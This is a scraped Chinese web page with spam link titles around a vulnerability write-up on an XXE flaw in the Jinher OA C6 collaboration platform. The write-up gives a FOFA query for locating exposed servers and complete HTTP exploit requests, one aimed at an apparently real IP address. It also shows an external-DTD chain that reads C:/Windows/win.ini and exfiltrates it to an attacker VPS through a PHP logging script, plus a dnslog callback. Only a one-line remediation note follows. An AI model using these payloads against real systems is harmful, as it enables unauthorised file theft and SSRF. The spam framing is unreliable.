当前位置: 首页 > news >正文

个人网站可以做seo吗如何做供求网站

个人网站可以做seo吗,如何做供求网站,企业电子邮箱格式,杭州义牛网络技术有限公司0x01 产品描述#xff1a; 金和C6协同管理平台是以精确管理思想为灵魂#xff0c;围绕“企业协同四层次理论”模型#xff0c;并紧紧抓住现代企业管理的六个核心要素#xff1a;文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…0x01 产品描述 金和C6协同管理平台是以精确管理思想为灵魂围绕“企业协同四层次理论”模型并紧紧抓住现代企业管理的六个核心要素文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。0x02 漏洞描述 金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。0x03 搜索语句 Fofabodyc6/Jhsoft.Web.login 0x04 漏洞复现 利用dnslog复现 POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/xml!DOCTYPE root [ !ENTITY % remote SYSTEM http://123.0olbin.dnslog.cn %remote;] 服务器快速检测  POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1 Host: 61.133.99.56:88 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/xml!DOCTYPE root [ !ENTITY % remote SYSTEM http://your-vps:port/test.xml %remote;]利用dtd获取数据 整体流程poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。 Dtd内容是XXE无回显利用方式将内容外带到其他地方将内容通过get.php写入file.txt。 首先在vps上创建以下脚本 ?php $data$_GET[file]; $myfile fopen(file.txt, w); fwrite($myfile, $data); fclose($myfile); ? 构造dtd用以读取dtd里内容如下 !ENTITY % all !ENTITY send SYSTEM http://your-vps:port/get.php?file%file; 构造完成后vps启动服务用于信息监听 请求构造以下数据 POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/xml?xml version1.0? !DOCTYPE ANY[ !ENTITY % file SYSTEM file:///C:/Windows/win.ini !ENTITY % remote SYSTEM http://your-vps:port/xxe.dtd %remote; %all; ] rootsend;/root 获取win.ini数据 解码后0x05 修复建议 官方已修复该漏洞请用户联系厂商修复漏洞http://www.jinher.com/
http://www.laogonggong.com/news/106912.html

相关文章:

  • 宁波网站建设制作公司排名网站开发难易处
  • 购物网站功能介绍焦作app网站建设
  • 建设个人技术网站阿里巴巴免费做国际网站
  • 如何做网站评估分析镇江微信推广平台
  • 南通网站建设小程序电子网站建设设计
  • 福州工程建设信息网站重庆制作企业网站
  • 做h5的网站有哪些做网站先付款
  • 中企动力网站后台赣州是哪个省
  • 网站建设维护单选题网页效果图素材
  • 用asp做的一个网站实例源代码响应式网站模板企业
  • 好做的网站国有企业参股管理暂行办法
  • 2021能打开的网站免费网站开发最新技术
  • 建设银行杭州网站首页平板网站开发环境
  • 云南省建设厅网站二建河北省网站建设
  • 建设网站的获客渠道电子商务网站的整个建设流程
  • 网站被k原因转发文章 WordPress
  • 建一个网站大概需要多少钱口碑好个人品牌营销公司
  • 长沙做网站 青创互联ui设计和平面设计哪个好学
  • 2018网站做外链企业介绍ppt案例欣赏
  • 网站建设实验分析总结深圳设计周展会2023时间
  • 安徽省建筑业信息一体化平台网seo策划
  • 做零食用哪个网站好广东建设数据开放平台系统
  • 亚马逊官方网站怎么做沈阳网站制作
  • 华为软件开发流程seo关键词快速排名软件
  • 如何做网站seo优化神箭手wordpress免费吗
  • 嘉峪关市住房和城乡建设局网站变装 Wordpress 小说
  • wordpress主机分类信息网站绿岛网
  • 腾讯网站建设的基本情况网站建设报价单初期整理
  • html网站优化门户网站整改情况报告
  • 做网站后期需要什么费用沧州网站建设联系电话